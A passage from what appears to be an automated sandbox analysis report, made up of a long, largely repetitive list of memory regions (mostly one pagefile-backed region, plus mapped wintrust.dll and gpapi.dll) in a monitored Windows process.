	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2226
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2227
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2228
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2229
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2230
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2231
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2232
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2233
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2234
	        start_va = 0x76c00000
	          end_va = 0x76c41fff
	     entry_point = 0x76c00000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")

Region:
	              id = 2236
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2237
	        start_va = 0x44e0000
	          end_va = 0x451ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2238
	        start_va = 0x4520000
	          end_va = 0x461ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004520000"
	        filename = ""

Region:
	              id = 2239
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2240
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2241
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2242
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2243
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2244
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2245
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2246
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2247
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2248
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2249
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2250
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2251
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2252
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2253
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2254
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2255
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2256
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2257
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2258
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2259
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2260
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2261
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2262
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2263
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2264
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2265
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2266
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2267
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2268
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2269
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2270
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2271
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2272
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2273
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2274
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2275
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2276
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2277
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2278
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2279
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2280
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2281
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2282
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2283
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2284
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2285
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2286
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2287
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2288
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2289
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2290
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2291
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2292
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2293
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2294
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2295
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2296
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2297
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2298
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2299
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2300
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2301
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2302
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2303
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2304
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2305
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2306
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2307
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2308
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2309
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2310
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2311
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2312
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2313
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2314
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2315
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2316
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2317
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2318
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2319
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2320
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2321
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2322
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2323
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2324
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2325
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2326
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2327
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2328
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2329
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2330
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2331
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2332
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2333
	        start_va = 0x6fe80000
	          end_va = 0x6fe9efff
	     entry_point = 0x6fe80000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll")

Region:
	              id = 2341
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2342
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2343
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2344
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2345
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2346
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2347
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2348
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2349
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2350
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2351
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2352
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2353
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2354
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2355
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2356
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2357
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2358
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2359
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2360
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2361
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2362
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2363
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2364
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2365
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2366
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2367
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2368
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2369
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2370
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2371
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2376
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2377
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2378
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2379
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2380
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2381
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2382
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2383
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2384
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2385
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2386
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2387
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2388
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2389
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2390
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2391
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2392
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2393
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2394
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2395
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

